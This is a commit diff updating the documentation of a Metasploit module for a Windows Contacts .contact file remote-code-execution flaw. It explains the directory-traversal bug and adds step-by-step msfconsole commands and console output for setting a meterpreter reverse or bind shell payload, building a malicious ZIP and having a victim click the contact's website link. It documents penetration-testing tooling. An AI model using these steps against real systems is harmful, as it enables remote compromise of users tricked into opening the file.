Update documentation to detail the verification steps and describe the module options
parent
58be84b3b8
commit
7bccdf2d0f
|
@ -1,30 +1,66 @@
|
|||
## Description
|
||||
|
||||
This module allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
|
||||
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
|
||||
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
|
||||
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
|
||||
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
|
||||
The "." chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
|
||||
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
|
||||
12345678901234567890123456789012345678901234567890123456789012345678901234567890
|
||||
This module allows remote attackers to execute arbitrary code on vulnerable
|
||||
installations of Microsoft Windows. User interaction is required to exploit
|
||||
this vulnerability in that the target must visit a malicious page or open a
|
||||
malicious file. The flaw is due to the processing of ".contact" files <c:Url>
|
||||
node param which takes an expected website value, however if an attacker
|
||||
references an executable file it will run that instead without warning instead
|
||||
of performing expected web navigation. This is dangerous and would be
|
||||
unexpected to an end user.
|
||||
|
||||
Executable files can live in a sub-directory so when the ".contact" website link
|
||||
is clicked it traverses directories towards the executable and runs. Making
|
||||
matters worse is if the the files are compressed then downloaded "mark of the
|
||||
web" (MOTW) may potentially not work as expected with certain archive utilitys.
|
||||
The "." chars allow directory traversal to occur in order to run the attackers
|
||||
supplied executable sitting unseen in the attackers directory. This advisory is
|
||||
a duplicate issue that currently affects Windows .VCF files, and released for
|
||||
the sake of completeness as it affects Windows .contact files as well.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Windows
|
||||
|
||||
Windows Contacts
|
||||
(tested on Windows 10.0.18282)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. `./msfconsole`
|
||||
2. `use exploit/windows/fileformat/`
|
||||
3. `set lport <lport>`
|
||||
4. `set lhost <lhost>`
|
||||
5. `exploit`
|
||||
2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
|
||||
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
|
||||
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
|
||||
5. Set the output internal file: `set FILENAME msf.com`
|
||||
6. Set the name of the contact: `set FULL_NAME John Smith`
|
||||
7. Set the output of the ZIP to be delivered to the target: `set ZIP John Smith.zip`
|
||||
8. `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### microsoft_windows_contact_remote_code_execution Tested on Windows 10.0.18282
|
||||
### Exploiting a Windows 10 host
|
||||
|
||||
1. Configure the module-specific settings.
|
||||
|
||||
```
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > exploit
|
||||
[*] Creating 'John Smith.zip'
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME metasploit.com
|
||||
FILENAME => metasploit.com
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FULL_NAME David Davidson
|
||||
FULL_NAME => David Davidson
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set ZIP David Davidson.zip
|
||||
ZIP => David Davidson.zip
|
||||
```
|
||||
|
||||
2. Configure the payload.
|
||||
```
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.199.148
|
||||
LHOST => 192.168.199.148
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run
|
||||
|
||||
[*] Creating 'David Davidson.zip'
|
||||
```
|
||||
|
||||
3. Send the ZIP to the target machine.
|
||||
|
||||
4. On the target machine, extract the ZIP file, open the .CONTACT file in the Windows Contacts viewer, and click the URL in the "Website" field.
|
||||
|
|
Loading…
Reference in New Issue